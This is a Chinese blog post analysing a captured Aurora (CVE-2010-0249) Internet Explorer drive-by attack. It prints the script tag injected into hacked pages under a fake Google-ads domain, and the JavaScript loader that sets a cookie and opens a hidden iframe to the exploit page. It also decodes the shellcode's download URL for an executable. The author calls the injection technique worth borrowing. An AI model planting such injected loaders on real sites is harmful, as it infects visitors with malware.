极光(CVE-2010-0249)IE 0day漏洞 Shellcode

极光IE 0day漏洞出来好多天了,各种杀毒软件公司极力宣传极光(CVE-2010-0249)IE 0day漏洞多么可怕,什么一打开网页就中招,什么被入侵电脑的游戏帐号可能被盗,银行帐号多么危险。我看这就是一个噱头,无非是骗骗菜鸟在电脑上安装个只占内存不杀毒的垃圾软件,自己的网站服务器都被挂马,还能指望它杀毒?!

在网络媒体报道极光漏洞第二天网上就有极光的Shellcode流出,我从一个被挂马的网站上也抓回一个,在自己机器上测试确实像传说中的一样“不弹,不卡”,就像当年的MS06014。但我在测试过程中发现我抓到的极光的Shellcode只有在IE6下才有效,跟网上报道的有很大出入,在没打补丁的IE7下测试都不能正常执行。

这几天也在关注什么网站被挂马,好第一时间抓个回来,希望能抓到那个被利用攻击谷歌的shellcode。之前公布的极光IE 0day(CVE-2010-0249) 就是针对IE6的。给大家分析一下这马到底是怎么挂到网站上去的。

首先是要入侵网站拿到网站的webshell

拿到网站的额webshell后,就可以直接编辑网站的页面。

在网页上插入挂马代码

我抓到的挂马代码写的特别巧妙,很值得借鉴呢,看下面代码,模仿的谷歌广告代码调用的脚本地址,而且是调用的图片,如果不仔细看是看不出来的。只要在网页上插入这么一段代码,马挂上了。

<script type="text/javascript" src="http://pagead2.googlesyndication.xx.xx/pagead/logo.gif"></script>

这个图片地址空间是挂马者自己的租用的空间,域名模仿了一些知名网络服务的域名,目的就是让人不易察觉。下面看看这个logo.gif到底是什么东西。

下载回来用写字板打开这个图片文件(其实写字板能打开的文件类型很多哦)内如如下:

function Get(){
function Get(){
var Then = new Date() 
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1=" 
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ 
} else 
{ 
document.cookie = "Cookie1=risb;expires="+ Then.toGMTString()
document.writeln("<iframe src="http://pagead2.googlesyndication.xx.xx/pagead/aurora.htm" height="0" width="0"></iframe>");
}
}Get();

挂马者考虑的还很全面居然写了cookies防止重复中马。其中iframe调用的就是极光的shellcode了。

我在这段代码中加了一行防止杀毒软件“误杀” Shellcode最终下载并运行的东西存在var u=swyice里面,十六进制转换加密的。用UE就能查看原来的内容内容%u7468%u7074 ->74 68 70 74 ->thpt ->http 看到这儿就能看出Shellcode执行的文件的地址是存在这里的,全部解开后就是:

http://pagead2.googlesyndication.xx.xx/pagead/1.exe

这个1.exe就是最终要在电脑中运行的文件。

后记:
1.极光(CVE-2010-0249)IE 0day漏洞 Shellcode 解密工具
2.IE漏洞实在太多,建议换FireFox浏览器或者其他非IE核心的浏览器。
3.杀毒软件不是万能的,别以为装个杀毒软件就什么网站都上。

《极光(CVE-2010-0249)IE 0day漏洞 Shellcode》有2个想法

发表评论

电子邮件地址不会被公开。 必填项已用*标注